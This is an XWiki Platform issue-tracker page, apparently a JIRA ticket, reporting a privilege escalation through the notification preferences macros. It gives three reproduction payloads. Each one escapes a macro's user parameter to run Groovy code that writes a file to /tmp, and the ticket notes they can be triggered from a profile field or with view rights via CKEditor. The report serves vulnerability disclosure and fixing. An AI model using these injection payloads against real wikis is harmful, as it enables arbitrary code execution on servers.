Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-20259

Privilege escalation (PR) from account/view through Notification Preferences Macros

    XMLWordPrintable

Details

    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce:
      Add

      {{notificationsFiltersPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"created from filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}
      
      {{notificationsAutoWatchPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit2.txt~").withWriter { out -> out.println(~"created from auto watch preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}
      
      {{notificationsEmailPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit3.txt~").withWriter { out -> out.println(~"created from email filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}
      

      to any place where you can use wiki syntax like the "about" section in your user profile as a user without programming or script rights.

      Expected result:

      No file is created.

      Actual result:

      A file /tmp/exploit.txt is created with content "created from filter preferences!". Similar files are created for the other macros. This shows privilege escalation to programming rights. The attack can be executed with just an account that permits write access to the user profile or also with just view rights via CKEditor's HTML converter.

      Attachments

        Issue Links

          Activity

            People

              MichaelHamann Michael Hamann
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: